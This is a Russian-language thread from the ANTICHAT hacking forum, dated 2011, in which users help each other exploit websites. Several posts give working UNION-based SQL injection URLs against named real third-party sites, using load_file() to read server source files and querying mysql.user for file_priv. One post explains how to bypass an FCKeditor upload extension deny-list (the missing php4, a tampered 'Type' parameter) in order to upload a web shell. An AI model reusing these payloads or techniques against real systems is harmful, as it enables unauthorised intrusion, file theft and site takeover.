ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
07.07.2011, 12:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от d1v
d1v said:
ну как это в ошибке не указыается?
Код:
Code:
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /srv/www/velotaxi.de/htdocs/php/subnav.php on line 33
не, я не имею в виду етот случай, если вдруг например не указывается, то как ещо можно узнать?
Сообщение от попугай
попугай said:
А смысл искать путь и находить папку для записи, если file_priv все равно там отключен?
а можно поинтерисоватся, а как вы об етом узнали?
|
|
|
|
07.07.2011, 12:12
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
чтоб проверить на включение file_priv, можно воспользоваться функцией локального чтения файлов, load_file(), или если доступна БД mysql.user, то в ней можно просмотреть на учетную запись сайта file_priv
|
|
|
07.07.2011, 12:36
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от alexvrn
alexvrn said:
Как обойти проверку файлов на формат и залить php
config.php
Код:
Code:
$Config['DeniedExtensions']['File'] = array('php','php3','php5','phtml','asp','aspx','ascx','jsp','cfm','cfc','pl','bat','exe','dll','reg','cgi') ;
Пропустили php4. Если на сервере установлены дополнительные яп/в application/x-httpd-php прописано нестандартное расширение - можно воспользоваться этим.
Мы можем пройти эту проверку:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ( ([/COLOR][COLOR="#0000BB"]count[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$arAllowed[/COLOR][COLOR="#007700"]) >[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]&& ![/COLOR][COLOR="#0000BB"]in_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sExtension[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$arAllowed[/COLOR][COLOR="#007700"]) ) || ([/COLOR][COLOR="#0000BB"]count[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$arDenied[/COLOR][COLOR="#007700"]) >[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]in_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sExtension[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$arDenied[/COLOR][COLOR="#007700"]) ) )[/COLOR][COLOR="#0000BB"]SendResults[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'202'[/COLOR][COLOR="#007700"]) ;[/COLOR][/COLOR]
Если напишем в переменную $_GET['Type'] то, что не предусматривает разработчик(Например '!!!'). И соответственно зальём шелл.
|
|
|
|
07.07.2011, 13:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от winstrool
winstrool said:
чтоб проверить на включение file_priv, можно воспользоваться функцией локального чтения файлов, load_file(), или если доступна БД mysql.user, то в ней можно просмотреть на учетную запись сайта file_priv
а можешь показать как ето делать на примере, например тут
http://www.miroboew-kazan.ru/news.php?id=3%27+union+select+1,2,3,4%20,5,6,7--
|
|
|
|
07.07.2011, 13:16
|
|
Guest
Сообщений: n/a
Провел на форуме:
195266
Репутация:
53
|
|
http://www.miroboew-kazan.ru/news.php?id=-3+union+select+1,(select+load_file('/home/virtwww/w_miroboew-kaz-ru_37979ae4/http/news.php')),3,4,5,6,7--+
Только у тя прав нету файловых
И вообще, по теме залива шелла через мускульную инъекцию дохрена написано. Не проще почитать всё разом, чтобы усвоить всё сразу? Тебе ж выше в куче постов всё подробно разжевали что и как.
|
|
|
|
07.07.2011, 13:23
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от Melfis
Melfis said:
http://www.miroboew-kazan.ru/news.php?id=-3+union+select+1,(select+load_file('/home/virtwww/w_miroboew-kaz-ru_37979ae4/http/news.php')),3,4,5,6,7--+
Только у тя прав нету файловых
што дебе дало знать што прав нету? и што бы я увидел если бы они были?
|
|
|
|
07.07.2011, 13:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
195266
Репутация:
53
|
|
Сообщение от qaz
qaz said:
што дебе дало знать што прав нету? и што бы я увидел если бы они были?
Подними у ся вебсервер, сделай какой-нить простой скрипт с выборкой из базы и принимаемым параметром от юзвера. И собсна потесть. В основном при установке ты будешь под рутом, у которого есть file_priv - там и увидишь что и как.
|
|
|
|
07.07.2011, 13:53
|
|
Guest
Сообщений: n/a
Провел на форуме:
195266
Репутация:
53
|
|
Если прав нету, то ничего не выводится. Если есть - содержимое файла ;-(
зы. разве в пхп можно через echo выводить массив? Но тут может я ошибаюсь...
|
|
|
|
07.07.2011, 13:54
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от qaz
qaz said:
ну сделал
сам скрипт
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/COLOR][/COLOR]
сделал как ты показывал, увидел тотже вывод
http://mai1-ru.h2m.ru/index.php?id=4'+union+select+(select+load_file('/usr/home/mai1-ru/htdocs/index.php'))--+
што я должен из етого понять? непойму У себя сервер, где ты будешь под рутом, а не на хостинге. Так же убедись, что путь с файлом существует.
|
|
|
|
07.07.2011, 13:55
|
|
Guest
Сообщений: n/a
Провел на форуме:
90728
Репутация:
62
|
|
Сообщение от qaz
qaz said:
а можешь показать как ето делать на примере, например тут
http://www.miroboew-kazan.ru/news.php?id=3%27+union+select+1,2,3,4%20,5,6,7--
Сообщение от None
http://www.miroboew-kazan.ru/news.php?id=-3+union+select+1,file_priv,3,4,5,6,7+from+mysql.us er+where+user=0x67625F6D69726F626F6577--+
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
